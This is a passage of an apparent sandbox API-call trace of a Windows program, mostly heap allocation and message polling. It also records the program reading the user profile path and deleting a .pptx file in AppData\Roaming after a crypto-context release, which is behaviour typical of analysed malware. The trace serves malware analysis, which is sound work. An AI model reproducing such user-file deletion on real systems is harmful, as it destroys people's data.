lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.179] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.179] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0206.179] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.188] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.188] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.188] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.188] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.188] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0206.188] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.189] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.189] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.189] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0206.189] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.189] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c08 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.190] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0206.191] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0206.191] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.192] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0206.192] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.192] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0206.192] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.192] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0206.192] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.192] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.192] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.192] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.192] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.192] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.192] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0206.192] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.192] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0206.192] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.193] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.193] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.193] CryptReleaseContext (hProv=0xad2940, dwFlags=0x0) returned 1 [0206.193] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.193] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.193] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.193] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.193] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.193] PeekMessageW (in: lpMsg=0x8bf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf140) returned 0 [0206.193] FreeLibrary (hLibModule=0x74d40000) returned 1 [0206.193] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.193] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.193] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.194] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.194] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.194] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d80 [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.194] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.194] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.194] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0206.195] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0206.195] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0206.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.196] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x86) returned 0x2420898 [0206.196] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/OjU _gfFJ vK4z9.pptx", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OjU _gfFJ vK4z9.pptx", lpFilePart=0x8bedfc*="OjU _gfFJ vK4z9.pptx") returned 0x42 [0206.196] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0206.196] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OjU _gfFJ vK4z9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oju _gffj vk4z9.pptx")) returned 0x2020 [0206.196] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OjU _gfFJ vK4z9.pptx", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb8167bd0, ftCreationTime.dwHighDateTime=0x1d4c968, ftLastAccessTime.dwLowDateTime=0x87eb4c50, ftLastAccessTime.dwHighDateTime=0x1d4d558, ftLastWriteTime.dwLowDateTime=0x87eb4c50, ftLastWriteTime.dwHighDateTime=0x1d4d558, nFileSizeHigh=0x0, nFileSizeLow=0x16b6c, dwReserved0=0xd98, dwReserved1=0x4, cFileName="OjU _gfFJ vK4z9.pptx", cAlternateFileName="OJU_GF~1.PPT")) returned 0xaa5820 [0206.196] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\OjU _gfFJ vK4z9.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\oju _gffj vk4z9.pptx")) returned 1 [0206.198] FindNextFileW (in: hFindFile=0xaa5820, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb8167bd0, ftCreationTime.dwHighDateTime=0x1d4c968, ftLastAccessTime.dwLowDateTime=0x87eb4c50, ftLastAccessTime.dwHighDateTime=0x1d4d558, ftLastWriteTime.dwLowDateTime=0x87eb4c50, ftLastWriteTime.dwHighDateTime=0x1d4d558, nFileSizeHigh=0x0, nFileSizeLow=0x16b6c, dwReserved0=0xd98, dwReserved1=0x4, cFileName="OjU _gfFJ vK4z9.pptx", cAlternateFileName="OJU_GF~1.PPT")) returned 0 [0206.198] FindClose (in: hFindFile=0xaa5820 | out: hFindFile=0xaa5820) returned 1 [0206.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0206.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0206.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0206.199] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0206.199] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0206.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0206.199] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0b0 [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d80 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9f90 [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.200] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0206.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0206.200] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0206.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0206.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1938 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0206.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0206.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0206.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0206.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0206.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0206.201] HeapFree (in: 